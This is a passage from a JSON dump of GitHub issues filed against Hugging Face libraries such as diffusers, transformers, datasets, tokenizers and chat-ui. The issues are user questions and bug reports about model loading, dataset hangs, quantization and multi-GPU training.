https://huggingface.co/data/nfs/gdiist/model/llama-7b-hf/resolve/main/tokenizer.json failed with fatal error \r\nthread 'main' panicked at 'called `Result::unwrap()` on an `Err` value: \"Model \\\"data/nfs/gdiist/model/llama-7b-hf\\\" on the Hub doesn't have a tokenizer\"', benchmark/src/main.rs:147:78\r\nnote: run with `RUST_BACKTRACE=1` environment variable to display a backtrace\r\nAborted (core dumped)\r\n\r\nI want to know if it's the reason for using the local model or the lack of parameters\uff1f\n\n### Expected behavior\n\n1. Help me using benchmark tool after docker run\r\n2. Tell me how to use 2 gpus to run a local model in docker run\r\n\r\nThanks\uff01", "url": "https://github.com/huggingface/text-generation-inference/issues/765", "state": "closed", "labels": [], "created_at": "2023-08-03T09:28:07Z", "updated_at": "2023-10-16T01:50:10Z", "user": "Laych7" }, { "repo": "huggingface/diffusers", "number": 4448, "title": "Outpainting results from diffusers' StableDiffusionControlNetPipeline is much worse than those from A1111 webui. How to improve?", "body": "I am trying to outpaint some human images (mainly the lower-body part) with SD 1.5 conditioned on ControlNet's inpainting and openpose. I have been using A1111 webui with ControlNet extension and it has been working quite well:\r\nHere are my settings in the webui:\r\n\"Screenshot\r\n![1691046578453](https://github.com/huggingface/diffusers/assets/50854238/8baf5891-6fe8-4006-bce9-bca903a3d6bf)\r\n\"Screenshot\r\n\r\nNote that 2 ControlNet units are enabled, one for OpenPose and one for ControlNet's inpainting model. For OpenPose I enabled \"Preview as Input\" and upload my custom json file with all joints defined (although the lower-body joints are not visible in the input image).\r\nHere is the result I get from the webui, which looks good:\r\n![00001-2019210750](https://github.com/huggingface/diffusers/assets/50854238/491a2de1-180c-473d-83d0-44376c4cc7f1)\r\n\r\nNow, I'm trying to reproduce this result using diffusers' StableDiffusionControlNetPipeline. 
Below is my code:\r\n\r\n\r\n\r\n```\r\nimport numpy as np\r\nfrom diffusers import StableDiffusionControlNetPipeline, ControlNetModel, DDIMScheduler\r\nimport torch\r\nfrom diffusers.utils import load_image\r\nimport cv2\r\nfrom PIL import Image\r\n\r\ndef make_inpaint_condition(image, image_mask):\r\n image = np.array(image.convert(\"RGB\")).astype(np.float32) / 255.0\r\n image_mask = np.array(image_mask.convert(\"L\")).astype(np.float32)\r\n assert image.shape[0:1] == image_mask.shape[0:1], \"image and image_mask must have the same image size\"\r\n image[image_mask < 128] = -1.0 # set as masked pixel\r\n image = np.expand_dims(image, 0).transpose(0, 3, 1, 2)\r\n image = torch.from_numpy(image)\r\n return image\r\n\r\n\r\ncontrolnet_inpaint = ControlNetModel.from_pretrained('lllyasviel/control_v11p_sd15_inpaint', \r\n torch_dtype=torch.float16)\r\ncontrolnet_openpose = ControlNetModel.from_pretrained('lllyasviel/control_v11p_sd15_openpose', \r\n torch_dtype=torch.float16)\r\npipe = StableDiffusionControlNetPipeline.from_pretrained('runwayml/stable-diffusion-v1-5', \r\n controlnet=[controlnet_inpaint, controlnet_openpose], \r\n torch_dtype=torch.float16, \r\n safety_checker=None).to('cuda')\r\npipe.scheduler = DDIMScheduler.from_config(pipe.scheduler.config)\r\npipe.enable_model_cpu_offload()\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\n\r\n \r\noriginal_image = load_image('./image.png')\r\nmask_image = load_image('./mask.png')\r\ninpaint_condition_image = make_inpaint_condition(original_image, mask_image)\r\nopenpose_condition_image = load_image('./pose.png')\r\ngenerated_img = pipe(prompt=\"best quality, photorealistic, empty background\", \r\n negative_prompt=\"lowres, bad hands, bad feet, worst quality\",\r\n num_inference_steps=20,\r\n guidance_scale=10.0,\r\n image=[inpaint_condition_image, openpose_condition_image]).images[0]\r\n\r\ngenerated_img.save('./test.png') \r\n```\r\n\r\nand here is the result I get from diffusers:\r\n![test (17)](https://github.com/huggingface/diffusers/assets/50854238/59fe3240-2650-4d9e-a46f-4359b368dc93)\r\n\r\nThe legs look much less realistic and the background is kind of noisy. I have been using the same SD model (sd v1.5), same controlnet models (v1.1 for OpenPose and inpainting), and same sampler (DDIM), but the results from diffusers are much worse than the webui. What can I do to reproduce the results I get from the webui?\r\n\r\nIt also seems that with the diffusers pipeline, the unmasked part is also slightly modified. 
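If the unmasked region must stay bit-exact, one workaround is to composite the original pixels back after generation; a minimal sketch with PIL, reusing `original_image`, `mask_image`, and `generated_img` from the code above, and assuming the white area of `mask.png` marks the region to outpaint:

```python
from PIL import Image

# Keep generated pixels only inside the white (masked) region and restore the
# original pixels everywhere else.
def composite_unmasked(original, generated, mask):
    mask_l = mask.convert("L").resize(generated.size)
    original_rgb = original.convert("RGB").resize(generated.size)
    # Image.composite takes image1 where the mask is white, image2 where black.
    return Image.composite(generated.convert("RGB"), original_rgb, mask_l)

final_img = composite_unmasked(original_image, generated_img, mask_image)
final_img.save("./test_composited.png")
```

Note this only hides the drift in the unmasked area; it does not explain it.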
Is there any post-processing applied to it?", "url": "https://github.com/huggingface/diffusers/issues/4448", "state": "closed", "labels": [], "created_at": "2023-08-03T07:19:12Z", "updated_at": "2023-08-30T05:35:03Z", "user": "xiyichen" }, { "repo": "huggingface/transformers", "number": 25280, "title": "How to download files from HF spaces", "body": "### System Info\n\ngoogle colab \n\n### Who can help?\n\n@sanchit-gandhi @rock\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nI tried:\r\n```\r\nfrom huggingface_hub import hf_hub_download, hf_hub_url\r\n# model_path = hf_hub_download(repo_id=\"xinyu1205/recognize-anything\", filename=\"tag2text_swin_14m.pth\", local_dir = \"/content\")\r\n```\r\nbut it throws an error that the repo is not present.\r\n\n\n### Expected behavior\n\nDownload the file.", "url": "https://github.com/huggingface/transformers/issues/25280", "state": "closed", "labels": [], "created_at": "2023-08-03T07:02:03Z", "updated_at": "2023-09-11T08:02:40Z", "user": "andysingal" }, { "repo": "huggingface/diffusers", "number": 4445, "title": "How to finetune a LoRA model?", "body": "**Is your feature request related to a problem? Please describe.**\r\nIf I have a model from civitai, how do I finetune it in SD 1.5 and SDXL?\r\n\r\n**Describe the solution you'd like**\r\n\r\n**Describe alternatives you've considered**\r\n\r\n**Additional context**\r\n", "url": "https://github.com/huggingface/diffusers/issues/4445", "state": "closed", "labels": [ "stale" ], "created_at": "2023-08-03T01:55:15Z", "updated_at": "2023-09-12T15:03:49Z", "user": "kelisiya" }, { "repo": "huggingface/sentence-transformers", "number": 2268, "title": "How to chop up a long document into chunks of max sequence length?", "body": "Given a long document, how do I chop it up into chunks so that each chunk is within the [max sequence length](https://www.sbert.net/examples/applications/computing-embeddings/README.html#input-sequence-length) of a model? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2268", "state": "open", "labels": [], "created_at": "2023-08-02T16:50:09Z", "updated_at": "2023-08-04T18:47:22Z", "user": "siddhsql" }, { "repo": "huggingface/dataset-viewer", "number": 1602, "title": "Parallel steps update incoherence", "body": "See the discussion https://huggingface.co/datasets/BelleGroup/multiturn_chat_0.8M/discussions/1#64c9e88a6a26cddbecd9bec6\r\n\r\nBefore the dataset update, the `split-first-rows-from-parquet` response was a success, and thus the `split-first-rows-from-streaming` response, computed later, is a `ResponseAlreadyComputedError` error.\r\n\r\nBut after the dataset update, the `split-first-rows-from-parquet` response was an error (due to a disk issue: `FileSystemError`) and, due to a heavy load on the infra, the `split-first-rows-from-streaming` response has not been processed yet, so it's still `ResponseAlreadyComputedError`.\r\n\r\nPossibilities:\r\n1. remove `ResponseAlreadyComputedError`, and copy the response (doubles storage)\r\n2. 
change the model for parallel steps, and store only once. Let's say we have M+N parallel steps. If M steps are successful (normally with the same response) and N steps are erroneous, we store the successful response content once, plus all the responses with the success content stripped from the successful ones. It is a lot of complexity.\r\n3. keep the logic, but if a parallel step gives an error whereas it had a successful response before AND the other parallel step is `ResponseAlreadyComputedError`, copy the successful answer to the other step. Seems brittle and overly complex.\r\n4. keep the logic, but if a parallel step gives an error whereas it had a successful response before AND the other parallel step is `ResponseAlreadyComputedError`, delete the other answer\r\n\r\nNone seems like a good idea. Do you have better ideas @huggingface/datasets-server ?", "url": "https://github.com/huggingface/dataset-viewer/issues/1602", "state": "closed", "labels": [ "bug", "question", "P1" ], "created_at": "2023-08-02T13:44:35Z", "updated_at": "2024-02-06T14:52:06Z", "user": "severo" }, { "repo": "huggingface/transformers", "number": 25264, "title": "[Question] How to load AutoFeatureExtractor on GPU?", "body": "Hi, I am following this guide to learn how to do audio classification with wav2vec2: https://huggingface.co/docs/transformers/main/tasks/audio_classification\r\n\r\nI intend to extract features from my data with the following code:\r\n```\r\nfeature_extractor = AutoFeatureExtractor.from_pretrained(\"/workspace/models/wav2vec2-large-robust\")\r\n\r\ndef preprocess_function(examples):\r\n    audio_arrays = [x[\"array\"] for x in tqdm(examples[\"audio\"])]\r\n    inputs = feature_extractor(\r\n        audio_arrays, sampling_rate=feature_extractor.sampling_rate, max_length=16000, truncation=True\r\n    )\r\n    return inputs\r\n\r\nencoded_audio_dataset_train = audio_dataset_train.map(preprocess_function, remove_columns=\"audio\", batched=True)\r\n```\r\nBut it seems the extractor is loaded on the CPU instead of the GPU, and I couldn't find in the documentation how to set the device for the feature extractor. I assume the feature extraction is done by the wav2vec2 model itself, right? If so, how do I do this on GPU? Or is it mentioned in some documentation that I didn't notice? \r\n\r\nThis is my first time using the transformers library for audio processing, so please forgive my clumsiness. \r\n\r\nAny help is much appreciated.", "url": "https://github.com/huggingface/transformers/issues/25264", "state": "closed", "labels": [], "created_at": "2023-08-02T12:26:20Z", "updated_at": "2023-09-11T08:02:43Z", "user": "treya-lin" }, { "repo": "huggingface/datasets", "number": 6111, "title": "raise FileNotFoundError(\"Directory {dataset_path} is neither a `Dataset` directory nor a `DatasetDict` directory.\" )", "body": "### Describe the bug\n\nFor researchers in some countries or regions, it is usually the case that downloading with `load_dataset` is blocked by the complex network environment. 
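One hedged workaround, assuming a reachable mirror of the Hub exists: `huggingface_hub` honors the `HF_ENDPOINT` environment variable, so pointing it at a mirror before import can restore downloads. A minimal sketch; the mirror URL is an assumption, substitute whatever endpoint is actually reachable:

```python
import os

# HF_ENDPOINT is read by huggingface_hub; it must be set before the first
# import of datasets/transformers in the process. The URL is an assumption.
os.environ["HF_ENDPOINT"] = "https://hf-mirror.com"

from datasets import load_dataset

ds = load_dataset("cifar100")
```
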
People in these regions often prefer to use git clone or other programming tricks to manually download the files to disk (for example, [How to elegantly download hf models, zhihu zhuanlan](https://zhuanlan.zhihu.com/p/475260268) proposed a crawler-based solution, [Is there any mirror for hf_hub, zhihu answer](https://www.zhihu.com/question/371644077) provided some cloud-based solutions, and [How to avoid pitfalls on Hugging face downloading, zhihu zhuanlan] gave some useful suggestions), and then use `load_from_disk` to get the dataset object. \r\nHowever, when one finally has the local files on disk, it is still buggy when trying to load the files into objects. \n\n### Steps to reproduce the bug\n\nSteps to reproduce the bug:\r\n1. Find the CIFAR dataset on Hugging Face: https://huggingface.co/datasets/cifar100/tree/main\r\n2. Click the \":\" button to show the \"Clone repository\" option, and then follow the prompts in the box:\r\n ```bash\r\n cd my_directory_absolute\r\n git lfs install\r\n git clone https://huggingface.co/datasets/cifar100\r\n ls my_directory_absolute/cifar100 # confirm that the directory exists and it is OK. \r\n ```\r\n3. Write a Python file to try to load the dataset:\r\n```python\r\nfrom datasets import load_dataset, load_from_disk\r\ndataset = load_from_disk(\"my_directory_absolute/cifar100\")\r\n```\r\nNotice that according to issue #3700 , it is wrong to use load_dataset(\"my_directory_absolute/cifar100\"), so we must use load_from_disk instead. \r\n\r\n4. Then you will see the error reported:\r\n```log\r\n---------------------------------------------------------------------------\r\nFileNotFoundError Traceback (most recent call last)\r\nCell In[5], line 9\r\n 1 from datasets import load_dataset, load_from_disk\r\n----> 9 dataset = load_from_disk(\"my_directory_absolute/cifar100\")\r\n\r\nFile ~/miniconda3/envs/ai/lib/python3.10/site-packages/datasets/load.py:2232, in load_from_disk(dataset_path, fs, keep_in_memory, storage_options)\r\n 2230 return DatasetDict.load_from_disk(dataset_path, keep_in_memory=keep_in_memory, storage_options=storage_options)\r\n 2231 else:\r\n-> 2232 raise FileNotFoundError(\r\n 2233 f\"Directory {dataset_path} is neither a `Dataset` directory nor a `DatasetDict` directory.\"\r\n 2234 )\r\n\r\nFileNotFoundError: Directory my_directory_absolute/cifar100 is neither a `Dataset` directory nor a `DatasetDict` directory.\r\n```\n\n### Expected behavior\n\nThe dataset should load successfully. 
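For what it's worth, a likely explanation (an assumption, not a confirmed diagnosis): `load_from_disk` only reads the Arrow layout written by `save_to_disk`, and a plain `git clone` of a Hub dataset repo is not in that format. A minimal sketch of the alternative route, using the same hypothetical path as above:

```python
from datasets import load_dataset

# A git clone of a Hub dataset repo contains a loading script and/or raw data
# files, which is what `load_dataset` (not `load_from_disk`) knows how to read.
dataset = load_dataset("my_directory_absolute/cifar100")
```
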
\n\n### Environment info\n\n```bash\r\ndatasets-cli env\r\n```\r\n-> results:\r\n```txt\r\n\r\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- `datasets` version: 2.14.2\r\n- Platform: Linux-4.18.0-372.32.1.el8_6.x86_64-x86_64-with-glibc2.28\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.3\r\n```", "url": "https://github.com/huggingface/datasets/issues/6111", "state": "closed", "labels": [], "created_at": "2023-08-02T09:17:29Z", "updated_at": "2023-08-29T02:00:28Z", "comments": 3, "user": "2catycm" }, { "repo": "huggingface/transformers", "number": 25257, "title": "How to print out the data loaded in each epoch during trainer.train() training?", "body": "### Feature request\n\nPlease tell me: how can I print out the data loaded in each epoch during trainer.train() training?\n\n### Motivation\n\nHow can I print out the data loaded in each epoch during trainer.train() training?\n\n### Your contribution\n\nHow can I print out the data loaded in each epoch during trainer.train() training?", "url": "https://github.com/huggingface/transformers/issues/25257", "state": "closed", "labels": [], "created_at": "2023-08-02T09:13:55Z", "updated_at": "2023-09-11T08:02:47Z", "user": "ahong007007" }, { "repo": "huggingface/tokenizers", "number": 1310, "title": "How to train a BPE tokenizer with multiple CPUs", "body": "Hi\r\n\r\nI tried to train a BPE tokenizer on about 10GB of text, but it seems extremely slow (it has run for more than 24 hours and has not finished yet).\r\n\r\nIs there a way to turn on multi-CPU training (htop shows only 1 CPU used)? \r\n\r\n\r\nHere is the code.\r\n```\r\nfrom tokenizers import Tokenizer, decoders, models, normalizers, pre_tokenizers, trainers, processors\r\n\r\ntokenizer = Tokenizer(models.BPE())\r\ntokenizer.normalizer = normalizers.NFC()\r\ntokenizer.pre_tokenizer = pre_tokenizers.ByteLevel(add_prefix_space=False)\r\ntokenizer.post_processor = processors.ByteLevel(trim_offsets=False)\r\ntokenizer.decoder = decoders.ByteLevel()\r\n\r\nspecial_tokens = [\"<unk>\", \"<s>\", \"</s>\"]  # example special tokens\r\n\r\ntrainer = trainers.BpeTrainer(\r\n    vocab_size = 50000,\r\n    min_frequency = 1,\r\n    initial_alphabet = pre_tokenizers.ByteLevel.alphabet(),\r\n    special_tokens = special_tokens\r\n)\r\n\r\ntokenizer.train([\"train_bpe.txt\"], trainer=trainer)\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1310", "state": "closed", "labels": [], "created_at": "2023-08-02T08:14:07Z", "updated_at": "2023-08-02T09:10:44Z", "user": "voidmagic" }, { "repo": "huggingface/chat-ui", "number": 380, "title": "Issue with Text Generation in Stream Mode", "body": "Hi\r\n\r\nText generation in stream mode is not functioning as expected on my development server, which is running behind a reverse proxy with the correct base path defined. I'm only receiving a single response in one go, whereas I expect a continuous stream of text.\r\n\r\nPlease assist me in resolving this issue. Thank you!", "url": "https://github.com/huggingface/chat-ui/issues/380", "state": "closed", "labels": [ "support" ], "created_at": "2023-08-01T19:07:50Z", "updated_at": "2023-09-10T12:22:16Z", "comments": 10, "user": "bilal-rachik" }, { "repo": "huggingface/transformers", "number": 25245, "title": "BLIP-2 request: If it's even possible, can you please provide an official example script of how to get the text (caption) features and image features into the same vector space (e.g. for cross-modal retrieval/search using BLIP-2 models, similar to what we can already do with CLIP). 
Thanks in advance.", "body": "### System Info\n\nlinux, python 3.8+, pytorch '1.13.0+cu116'\n\n### Who can help?\n\n@sgugger\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nN/A\n\n### Expected behavior\n\nN/A", "url": "https://github.com/huggingface/transformers/issues/25245", "state": "closed", "labels": [], "created_at": "2023-08-01T18:21:07Z", "updated_at": "2023-09-21T08:03:25Z", "user": "wingz1" }, { "repo": "huggingface/dataset-viewer", "number": 1591, "title": "Should we convert the datasets to other formats than parquet?", "body": "One OP asked for CSV conversion (not explicitly from the Hub itself): https://huggingface.co/datasets/medical_questions_pairs/discussions/3#64c8c2af527d76365563285c", "url": "https://github.com/huggingface/dataset-viewer/issues/1591", "state": "closed", "labels": [ "question", "feature request", "P2" ], "created_at": "2023-08-01T13:47:12Z", "updated_at": "2024-06-19T14:19:01Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1243, "title": "transformers.convert_graph_to_onnx.quantize equivalent with optimum?", "body": "Historically, I've used the following to quantize a model after training:\r\n\r\n```python\r\nimport sys\r\nfrom pathlib import Path \r\nfrom transformers.convert_graph_to_onnx import quantize\r\n\r\ninput_file = sys.argv[1]\r\nprint(\"Performing quantization of model '{}'\".format(input_file))\r\nquantized_model_path = quantize(Path(input_file))\r\nprint(\"Rename quantized model '{}' to '{}'\".format(quantized_model_path.name, input_file))\r\nquantized_model_path.replace(input_file)\r\n```\r\n\r\nIs there a way to accomplish the same type of quantization using`optimum-cli? The quantize method from above (that is deprecated) produces a much smaller model than optimum-cli. \r\n\r\n```\r\nOriginal model 448M multilingual-e5-small-onnx/model.onnx\r\nModel after above 112M multilingual-e5-small-onnx/model.onnx\r\n```\r\n\r\nI've tried the following export/quantize commands, but the model file size is still above 400MB\r\n\r\n```\r\n$ optimum-cli export onnx --task sentence-similarity -m intfloat/multilingual-e5-small --optimize O3 multilingual-e5-small-onnx\r\n$ optimum-cli onnxruntime quantize --onnx_model multilingual-e5-small-onnx --avx2 --output test\r\n```\r\n\r\n```\r\n403M Aug 1 09:38 test/model_quantized.onnx\r\n```\r\nThank you!", "url": "https://github.com/huggingface/optimum/issues/1243", "state": "closed", "labels": [], "created_at": "2023-08-01T07:59:03Z", "updated_at": "2023-08-01T21:45:46Z", "comments": 2, "user": "jobergum" }, { "repo": "huggingface/sentence-transformers", "number": 2266, "title": "How to measure the quanlity of embeddings?", "body": "I am using `sentence-transformers` to encode the big texts into input embeddings for a text classification task. However, I'm unsure how to compare the quality of embeddings when evaluating multiple models' performance. 
Could you please provide some advice?", "url": "https://github.com/huggingface/sentence-transformers/issues/2266", "state": "open", "labels": [], "created_at": "2023-08-01T06:59:41Z", "updated_at": "2023-09-01T06:12:39Z", "user": "sgwhat" }, { "repo": "huggingface/trl", "number": 597, "title": "How to run using multiple GPUs?", "body": "Hi, I'm not so familiar with training using multiple GPUs.\r\n\r\nI have a machine with 8 A100s; what should I do to run full-parameter SFT on a Llama-2-7B model? \r\nHow do I use the trl tool?\r\n\r\nThanks.", "url": "https://github.com/huggingface/trl/issues/597", "state": "closed", "labels": [], "created_at": "2023-08-01T06:36:27Z", "updated_at": "2023-08-21T03:39:46Z", "user": "jyC23333" }, { "repo": "huggingface/diffusers", "number": 4407, "title": "How to store hf_hub_download files in a local directory?", "body": "### Describe the bug\n\nRunning:\r\n```\r\nfrom huggingface_hub import hf_hub_url, hf_hub_download\r\n\r\n# Generate/show the URL\r\nhf_hub_url(\r\n    repo_id=\"XpucT/Deliberate\",\r\n    filename=\"Deliberate-inpainting.safetensors\",\r\n)\r\n\r\n# Download the file\r\nhf_hub_download(\r\n    repo_id=\"XpucT/Deliberate\",\r\n    filename=\"Deliberate-inpainting.safetensors\",\r\n)\r\n```\r\nbut the file is not stored in the local directory.\n\n### Reproduction\n\nSame as above. \n\n### Logs\n\n_No response_\n\n### System Info\n\nkaggle notebook\n\n### Who can help?\n\n@sayakpaul @patrickvonplaten @will", "url": "https://github.com/huggingface/diffusers/issues/4407", "state": "closed", "labels": [ "bug" ], "created_at": "2023-08-01T05:21:39Z", "updated_at": "2023-08-01T05:55:46Z", "user": "andysingal" }, { "repo": "huggingface/datasets", "number": 6108, "title": "Loading local datasets got strangely stuck", "body": "### Describe the bug\n\nI try to use `load_dataset()` to load several local `.jsonl` files as a dataset. Every line of these files is a JSON structure containing only one key, `text` (yes, it is a dataset for an NLP model). The code snippet is:\r\n```python\r\nds = load_dataset(\"json\", data_files=LIST_OF_FILE_PATHS, num_proc=16)['train']\r\n```\r\nHowever, I found that the loading process can get stuck: the progress bar `Generating train split` no longer proceeds. While trying to find the cause and a solution, I found a really strange behavior. If I load the dataset in this way:\r\n```python\r\ndlist = list()\r\nfor _ in LIST_OF_FILE_PATHS:\r\n    dlist.append(load_dataset(\"json\", data_files=_)['train'])\r\nds = concatenate_datasets(dlist)\r\n```\r\nI can actually load all the files successfully, despite the slow speed. But if I load them in a batch as above, things go wrong. I did try to use Control-C to trace the stuck point, but the program cannot be terminated this way when `num_proc` is set to `None`. The only thing I can do is use Control-Z to hang it up and then kill it. 
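Before killing a stuck run, it is possible to see where it is hanging: Python's standard-library `faulthandler` can dump every thread's stack on a signal. A minimal sketch to add near the top of the loading script (the signal choice is arbitrary):

```python
import faulthandler
import signal

# Dump every thread's stack trace to stderr when the process receives SIGUSR1,
# e.g. run `kill -USR1 <pid>` from another shell while load_dataset hangs.
faulthandler.register(signal.SIGUSR1)
```

Note this registers the handler in the main process only; multiprocessing workers would need it set up in their own code.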
If I use more than 2 cpus, a Control-C would simply cause the following error:\r\n```bash\r\n^C\r\nProcess ForkPoolWorker-1:\r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/process.py\", line 314, in _bootstrap\r\n self.run()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/process.py\", line 108, in run\r\n self._target(*self._args, **self._kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/pool.py\", line 114, in worker\r\n task = get()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/queues.py\", line 368, in get\r\n res = self._reader.recv_bytes()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 224, in recv_bytes\r\n buf = self._recv_bytes(maxlength)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 422, in _recv_bytes\r\n buf = self._recv(4)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 387, in _recv\r\n chunk = read(handle, remaining)\r\nKeyboardInterrupt\r\nGenerating train split: 92431 examples [01:23, 1104.25 examples/s] \r\nTraceback (most recent call last):\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1373, in iflatmap_unordered\r\n yield queue.get(timeout=0.05)\r\n File \"\", line 2, in get\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/managers.py\", line 818, in _callmethod\r\n kind, result = conn.recv()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 258, in recv\r\n buf = self._recv_bytes()\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 422, in _recv_bytes\r\n buf = self._recv(4)\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/connection.py\", line 387, in _recv\r\n chunk = read(handle, remaining)\r\nKeyboardInterrupt\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nTraceback (most recent call last):\r\n File \"/mnt/data/liyongyuan/source/batch_load.py\", line 11, in \r\n a = load_dataset(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/load.py\", line 2133, in load_dataset\r\n builder_instance.download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 954, in download_and_prepare\r\n self._download_and_prepare(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1049, in _download_and_prepare\r\n self._prepare_split(split_generator, **prepare_split_kwargs)\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/builder.py\", line 1842, in _prepare_split\r\n for job_id, done, content in iflatmap_unordered(\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1387, in iflatmap_unordered\r\n [async_result.get(timeout=0.05) for async_result in async_results]\r\n File \"/usr/local/lib/python3.10/dist-packages/datasets/utils/py_utils.py\", line 1387, in \r\n [async_result.get(timeout=0.05) for async_result in async_results]\r\n File \"/usr/local/lib/python3.10/dist-packages/multiprocess/pool.py\", line 770, in get\r\n raise TimeoutError\r\nmultiprocess.context.TimeoutError\r\n```\r\nI have validated the basic correctness of these `.jsonl` files. They are correctly formatted (or they cannot be loaded singly by `load_dataset`) though some of the json may contain too long text (more than 1e7 characters). I do not know if this could be the problem. 
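To test the oversized-record hypothesis, a quick pre-scan can report the longest line per file so the culprit files can be isolated; a minimal sketch, assuming UTF-8 `.jsonl` files and hypothetical file names:

```python
# Report the longest line in each .jsonl file so oversized records can be found.
def longest_record(paths):
    for path in paths:
        max_len, max_no = 0, -1
        with open(path, encoding="utf-8") as f:
            for no, line in enumerate(f):
                if len(line) > max_len:
                    max_len, max_no = len(line), no
        print(f"{path}: line {max_no} is longest at {max_len} characters")

longest_record(["part-000.jsonl", "part-001.jsonl"])  # hypothetical paths
```
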
And there should not be any bottleneck in system's resource. The whole dataset is ~300GB, and I am using a cloud server with plenty of storage and 1TB ram. \r\nThanks for your efforts and patience! Any suggestion or help would be appreciated.\n\n### Steps to reproduce the bug\n\n1. use load_dataset() with `data_files = LIST_OF_FILES`\n\n### Expected behavior\n\nAll the files should be smoothly loaded. \n\n### Environment info\n\n- Datasets: A private datas", "url": "https://github.com/huggingface/datasets/issues/6108", "state": "open", "labels": [], "created_at": "2023-08-01T02:28:06Z", "updated_at": "2024-12-31T16:01:00Z", "comments": 7, "user": "LoveCatc" }, { "repo": "huggingface/chat-ui", "number": 379, "title": "Issue with Chat UI when deploying Text Generation API on a remote server", "body": "\r\nI am facing an issue with the Chat UI while using the Text Generation API. Everything works correctly when the Text Generation API is deployed on localhost, but the Chat UI doesn't work when the Text Generation API is deployed on a remote server.\r\n\r\nSteps to reproduce the problem:\r\n1. Deploy the Text Generation API on localhost.\r\n2. Use the Chat UI to generate text and verify that it works correctly.\r\n3. Deploy the Text Generation API on a remote server.\r\n4. Use the Chat UI again to generate text and notice that it no longer works.\r\n\r\nExpected behavior:\r\nThe Chat UI should work properly, whether the Text Generation API is deployed on localhost or on a remote server.\r\n\r\nAdditional information:\r\n- I am using version 0.4 of the Chat UI and version 0.9.3 of the Text Generation API.\r\n- The remote server hosting the Text Generation API responds correctly to requests.\r\n- Tests have been conducted with the \"text generation\" client and Postman.\r\n\r\nAny assistance in resolving this issue would be highly appreciated. Thank you!\r\n\r\n![20230731_191316](https://github.com/huggingface/chat-ui/assets/49948822/658df806-11a7-4268-855c-f0fdbbe724b5)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/379", "state": "open", "labels": [ "support" ], "created_at": "2023-07-31T17:22:49Z", "updated_at": "2023-09-18T12:55:45Z", "comments": 0, "user": "bilal-rachik" }, { "repo": "huggingface/chat-ui", "number": 378, "title": "Add support for endpoints requiring client authentication using PKI", "body": "Hi,\r\n\r\nAre you open to adding support for endpoints that require client authentication using PKI? I have a requirement to use client authentication with our backend inference server. \r\n\r\nCurrently authentication config from each endpoint is passed to the headers arg of the fetch command: https://github.com/huggingface/chat-ui/blob/main/src/lib/server/generateFromDefaultEndpoint.ts#L35\r\n\r\nMy quick googling has yielded this: https://sebtrif.xyz/blog/2019-10-03-client-side-ssl-in-node-js-with-fetch/ \r\ntl;dr; they create a `https.Agent(..)` which loads a PKI context from file which is passed to the `agent` arg in the fetch command. \r\n\r\nIf you're happy for this to be added, how would you like to separate the logic of authentication using headers and client authentication using an SSL context?\r\n\r\nThank you! 
:) ", "url": "https://github.com/huggingface/chat-ui/issues/378", "state": "closed", "labels": [ "question", "front" ], "created_at": "2023-07-31T17:13:53Z", "updated_at": "2023-08-15T18:51:29Z", "user": "cambriancoder" }, { "repo": "huggingface/chat-ui", "number": 377, "title": "Provide a login button, for existing users?", "body": "I just changed to another laptop, and didn't find a login button to see and work with my account from Huggingface. After I used once the Chat, I got a message to Login. I would suggest making it more traditional to have a username and a login button on the left sidebar.", "url": "https://github.com/huggingface/chat-ui/issues/377", "state": "closed", "labels": [ "enhancement", "front" ], "created_at": "2023-07-31T12:08:52Z", "updated_at": "2023-08-02T12:19:30Z", "comments": 1, "user": "tobiashochguertel" }, { "repo": "huggingface/datasets", "number": 6104, "title": "HF Datasets data access is extremely slow even when in memory", "body": "### Describe the bug\r\n\r\nDoing a simple `some_dataset[:10]` can take more than a minute.\r\n\r\nProfiling it:\r\n\"image\"\r\n\r\n`some_dataset` is completely in memory with no disk cache.\r\n\r\nThis is proving fatal to my usage of HF Datasets. Is there a way I can forgo the arrow format and store the dataset as PyTorch tensors so that `_tensorize` is not needed? And is `_consolidate` supposed to take this long?\r\n\r\nIt's faster to produce the dataset from scratch than to access it from HF Datasets!\r\n\r\n### Steps to reproduce the bug\r\n\r\nI have uploaded the dataset that causes this problem [here](https://huggingface.co/datasets/NightMachinery/hf_datasets_bug1).\r\n\r\n```python\r\n#!/usr/bin/env python3\r\nimport sys\r\nimport time\r\nimport torch\r\nfrom datasets import load_dataset\r\n\r\n\r\ndef main(dataset_name):\r\n # Start the timer\r\n start_time = 